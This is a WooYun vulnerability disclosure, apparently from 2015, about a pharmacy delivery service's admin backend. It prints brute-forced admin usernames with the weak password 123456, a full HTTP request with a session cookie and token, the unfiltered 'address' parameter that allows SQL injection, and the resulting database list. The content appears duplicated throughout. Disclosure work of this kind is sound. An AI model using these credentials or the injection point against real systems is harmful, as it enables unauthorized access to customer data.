叮当快药某后台弱口令+SQL注入敏感信息泄露

发表于 2015年07月13日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0126261

漏洞标题：叮当快药某后台弱口令+SQL注入敏感信息泄露

漏洞详情

披露状态：

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认，细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开

简要描述：

叮当快药某后台弱口令+SQL注入敏感信息泄露

详细说明：

买药要让我扫二维码加APP，这是主动让我来进行安全测试呀，进行搜索你们的网站等到了一个后台，没加验证码可进行暴力破解

暴破出N多管理员密码

wangjing	123456<br>
wangli	123456<br>
liming	123456<br>
wangpeng	123456<br>
liuli	123456<br>
liying	123456<br>
libo	123456<br>
chenli	123456<br>
wangli	123456<br>
wanghong	123456<br>
wangjing	123456<br>
yangfang	123456<br>
zhanghongmei	123456<br>
liying	123456<br>
liuli	123456<br>
liguifang	123456<br>
zhangnan	123456<br>
libo	123456<br>
wangli	123456

wangjing 123456

wangli 123456

liming 123456

wangpeng 123456

liuli 123456

liying 123456

libo 123456

chenli 123456

wangli 123456

wanghong 123456

wangjing 123456

yangfang 123456

zhanghongmei 123456

liying 123456

liuli 123456

liguifang 123456

zhangnan 123456

libo 123456

wangli 123456

进后台还发现存在SQL注入漏洞，可进行全站拖库，我是好人不拖库只做测试

POST /order/query.htm HTTP/1.1<br>
Host: erp.ddsy.com<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0<br>
Accept: text/plain, */*; q=0.01<br>
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3<br>
Accept-Encoding: gzip, deflate<br>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br>
X-Requested-With: XMLHttpRequest<br>
Referer: http://erp.ddsy.com/order/view.htm<br>
Content-Length: 109<br>
Cookie: td_cookie=137694995; td_cookie=137507137; ddsy_token="Jz3N/0qDhfyf4jm4msMBeQ=="; JSESSIONID=21D41308766B16EE686CBAAEACBE46C1<br>
X-Forwarded-For: 8.8.8.8<br>
Connection: keep-alive<br>
Pragma: no-cache<br>
Cache-Control: no-cacheid=&pharmacyName=&pharmacyId=&orderStatus=2&startDate=&address=111111&endDate=&province=&city=&page=1&rows=50

POST /order/query.htm HTTP/1.1

Host: erp.ddsy.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept: text/plain, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://erp.ddsy.com/order/view.htm

Content-Length: 109

Cookie: td_cookie=137694995; td_cookie=137507137; ddsy_token="Jz3N/0qDhfyf4jm4msMBeQ=="; JSESSIONID=21D41308766B16EE686CBAAEACBE46C1

X-Forwarded-For: 8.8.8.8

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cacheid=&pharmacyName=&pharmacyId=&orderStatus=2&startDate=&address=111111&endDate=&province=&city=&page=1&rows=50

address参数没进行过滤

available databases [20]:<br>
[*] APEX_030200<br>
[*] APPQOSSYS<br>
[*] CTXSYS<br>
[*] DBSNMP<br>
[*] EXFSYS<br>
[*] FLOWS_FILES<br>
[*] GENE<br>
[*] GOLDENGATE<br>
[*] MDSYS<br>
[*] O2O<br>
[*] OLAPSYS<br>
[*] ORDDATA<br>
[*] ORDSYS<br>
[*] OUTLN<br>
[*] OWBSYS<br>
[*] SYS<br>
[*] SYSMAN<br>
[*] SYSTEM<br>
[*] WMSYS<br>
[*] XDB

available databases [20]:

[*] APEX_030200

[*] APPQOSSYS

[*] CTXSYS

[*] DBSNMP

[*] EXFSYS

[*] FLOWS_FILES

[*] GENE

[*] GOLDENGATE

[*] MDSYS

[*] O2O

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WMSYS

[*] XDB

漏洞证明：

买药要让我扫二维码加APP，这是主动让我来进行安全测试呀，进行搜索你们的网站等到了一个后台，没加验证码可进行暴力破解

暴破出N多管理员密码

wangjing	123456<br>
wangli	123456<br>
liming	123456<br>
wangpeng	123456<br>
liuli	123456<br>
liying	123456<br>
libo	123456<br>
chenli	123456<br>
wangli	123456<br>
wanghong	123456<br>
wangjing	123456<br>
yangfang	123456<br>
zhanghongmei	123456<br>
liying	123456<br>
liuli	123456<br>
liguifang	123456<br>
zhangnan	123456<br>
libo	123456<br>
wangli	123456

wangjing 123456

wangli 123456

liming 123456

wangpeng 123456

liuli 123456

liying 123456

libo 123456

chenli 123456

wangli 123456

wanghong 123456

wangjing 123456

yangfang 123456

zhanghongmei 123456

liying 123456

liuli 123456

liguifang 123456

zhangnan 123456

libo 123456

wangli 123456

进后台还发现存在SQL注入漏洞，可进行全站拖库，我是好人不拖库只做测试

POST /order/query.htm HTTP/1.1<br>
Host: erp.ddsy.com<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0<br>
Accept: text/plain, */*; q=0.01<br>
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3<br>
Accept-Encoding: gzip, deflate<br>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br>
X-Requested-With: XMLHttpRequest<br>
Referer: http://erp.ddsy.com/order/view.htm<br>
Content-Length: 109<br>
Cookie: td_cookie=137694995; td_cookie=137507137; ddsy_token="Jz3N/0qDhfyf4jm4msMBeQ=="; JSESSIONID=21D41308766B16EE686CBAAEACBE46C1<br>
X-Forwarded-For: 8.8.8.8<br>
Connection: keep-alive<br>
Pragma: no-cache<br>
Cache-Control: no-cacheid=&pharmacyName=&pharmacyId=&orderStatus=2&startDate=&address=111111&endDate=&province=&city=&page=1&rows=50

POST /order/query.htm HTTP/1.1

Host: erp.ddsy.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept: text/plain, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://erp.ddsy.com/order/view.htm

Content-Length: 109

Cookie: td_cookie=137694995; td_cookie=137507137; ddsy_token="Jz3N/0qDhfyf4jm4msMBeQ=="; JSESSIONID=21D41308766B16EE686CBAAEACBE46C1

X-Forwarded-For: 8.8.8.8

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cacheid=&pharmacyName=&pharmacyId=&orderStatus=2&startDate=&address=111111&endDate=&province=&city=&page=1&rows=50

address参数没进行过滤

available databases [20]:<br>
[*] APEX_030200<br>
[*] APPQOSSYS<br>
[*] CTXSYS<br>
[*] DBSNMP<br>
[*] EXFSYS<br>
[*] FLOWS_FILES<br>
[*] GENE<br>
[*] GOLDENGATE<br>
[*] MDSYS<br>
[*] O2O<br>
[*] OLAPSYS<br>
[*] ORDDATA<br>
[*] ORDSYS<br>
[*] OUTLN<br>
[*] OWBSYS<br>
[*] SYS<br>
[*] SYSMAN<br>
[*] SYSTEM<br>
[*] WMSYS<br>
[*] XDB